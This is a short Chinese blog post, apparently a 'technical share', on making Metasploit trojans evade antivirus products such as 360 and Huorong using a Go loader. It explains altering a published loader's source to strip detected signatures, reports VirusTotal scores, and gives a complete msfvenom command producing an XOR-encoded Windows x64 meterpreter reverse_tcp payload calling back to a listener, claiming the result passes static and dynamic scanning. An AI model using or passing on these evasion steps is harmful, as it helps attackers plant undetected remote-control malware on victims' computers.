技术分享 | go语言源码免杀MSF木马
木马源码免杀两种形式:下载者和加载者
https://www.freebuf.com/articles/system/227468.html
前言
加载者的免杀分为两部分:
- 加载器本身的免杀,加载器源码因为在网上发布许久。特征码已被查杀。
- msf本身的shllcode免杀。需要对msf马进行多次混淆编码。
加载器免杀
这里我不放shellcode,看看网上加载器的特征会被多少AV识别。
在微步的VT 0/25
virustotal的VT 15/71
免杀的过了火绒,但是没过360。
接下来从源码级别看看能不能免杀加载器。
因为这个加载器放在freebuf很久了 360的肯定加入黑名单了。
对下载者做下改动,方便shellcode的填写。
把这个shellcode_buf删掉,火绒无报毒。说明这里是特征码之一。
将这个shellcode部分改写。
火绒无报毒,360无报毒 。
shellcode免杀
利用msfvenom进行多次编码绕过。
msfvenom -p windows/x64/meterpreter/reverse_tcp -e x64/xor_dynamic -i 3 lhost=192.168.7.122 lport=6666 -f c
这里我选择的是 x64/xor_dynamic编码 因为是64的马,最好选择x64的编码。
-i 是次数 3
这里单纯的利用编码就可绕过火绒动静态查杀,火绒还是很容易绕过的。
360静态查杀报毒,说明360对msfvenom编码查杀严格一些。
利用go语言生成完整加载者木马免杀
将两者结合
可过360动静态免杀。
过火绒动静态。